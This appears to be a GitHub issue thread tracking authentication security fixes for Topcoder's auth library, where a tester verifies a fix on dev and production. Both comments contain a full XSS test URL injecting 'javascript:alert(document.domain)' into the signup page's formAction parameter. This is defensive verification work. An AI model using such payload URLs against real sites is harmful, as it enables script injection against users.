### ISSUE TITLE
master ticket - Jira issues 

### ISSUE THREAD

**Issue by sachin-maheshwari** [topcoder-platform/tc-auth-lib#111]
This is master ticket for tracking all "new auth security" issues -

https://topcoder.atlassian.net/browse/VULN-2195

**Comment by drasticdpk** [comment]
Verified on Dev mode.
**Reference  After manipulating urls** :https://accounts-auth0.topcoder-dev.com/signup.html?regSource=null&firstName=Cynergy&lastName=Testing&utmSource=null&utmMedium=null&utmCampaign=null&formAction=javascript:alert(document.domain)&returnUrl=https%3A%2F%2Fchallenges.topcoder-dev.com%2F&state=g6Fo2SBTLVRWV1dhUXZUWWxINXdWMWpjYU5oMTB6UFgwb3dZVqN0aWTZIEhoWF94X1lPY3VZMUFldGsyMXZub3d1UXlpcWJaYUx6o2NpZNkgQlhXWFVXbmlsVlVQZE4wMXQyU2UyOVR3MlpZTkdadkg# 

[XSS_Verification.mp4.zip](https://github.com/topcoder-platform/tc-auth-lib/files/6148661/XSS_Verification.mp4.zip)

**Comment by drasticdpk** [comment]
**Verified on Prod mode**
![image](https://user-images.githubusercontent.com/25297859/112101729-3d6d5a80-8bcf-11eb-8a90-6c094816ba6f.png)
![image](https://user-images.githubusercontent.com/25297859/112101759-4d853a00-8bcf-11eb-80c7-e2caf6dae1f2.png)

Reference Link : https://accounts-auth0.topcoder.com/signup.html?regSource=tcBusiness&firstName=Cynergy&lastName=Testing&utmSource=null&utmMedium=null&utmCampaign=null&formAction=javascript:alert(document.domain)&returnUrl=https%3A%2F%2Fconnect.topcoder.com%2F&state=g6Fo2SB3Nk1MMHQ4eXVOTzFTdHhVTWl6WHlQRmJMdEFEd0tmMaN0aWTZIFpKM1ZfTUU1LWstQWxXcXh2TUdlbmUtN0pGd1JhczRwo2NpZNkgVVc3Qmhzbm1BUWgwaXRsNTZnMWpVUGlzQk85R29vd0Q
